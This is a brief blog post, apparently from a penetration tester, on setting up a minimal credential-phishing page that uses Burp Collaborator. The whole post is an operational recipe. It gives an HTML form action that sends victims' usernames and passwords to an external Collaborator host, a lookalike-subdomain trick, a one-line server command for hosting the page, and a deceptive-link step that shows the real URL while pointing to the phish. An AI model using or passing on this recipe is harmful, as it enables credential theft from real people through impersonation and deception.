Minimalistic Phishing Using Burp Collaborator

 I've done some smooth phishing work in my time, using the likes of evilginx2 and whatnot, but from time to time I just need a quick phishing setup for a little spear phish. I blogged last year about one way to do that using Serverless Phishing With AWS, but there is another way to do that with Burp Collaborater that is even faster to setup, though I admit a little less reliable.

 

 

Disclaimer: Some URLs in this post use HTTP and not HTTPS so use your own judgement how you want to set up your attack.

In the aforementioned blog post, I provided sample HTML which uses a form action to ultimately send the phished creds to an S3 bucket. For the Collaborator method, however, you'll simply configure the form action to send the creds to a Collaborator payload, like so:

<form action="http://<subdomain>.burpcollaborator.net/" method="get">

I have phished successfully using this method, and while it's not elegant, it can get the job done. For a successful phish, you should see an HTTP request come in with a request that contains the username and password. Admittedly, the phished user will then be redirected to an unsightly Collaborator web page containing random text, which isn't ultimate. Since Collaborator supports multi-leveled custom subdomains, I suppose to make that page a slightly less unsettling, you could use a custom subdomain that matches the website name, like so:

<example.com>.<subdomain>.burpcollaborator.net

This phish works great for a quick spear phish though there are definite drawbacks, including the fact that the Collaborator results are not persistent or easily exportable (unless maybe you could export with Taborator). The main benefit to this method though, is that it can be setup in less than 15 minutes. I have phished successfully using these steps:

1. Create an HTML file which impersonates a legitimate website, embedding a Collaborator payload in the form action

2. Host the HTML file on a cloud instance:

python2 -m SimpleHTTPServer 80

3. Send the victim a hyperlink that has the link text showing the legitimate URL and the href as the phishing site.

4. Watch for creds in Collaborator! Keep in mind, the creds may be URL encoded, so you may have to decode with Decoder.

 

Feel free to comment with your ideas to improve on this or other ideas on quick phishing!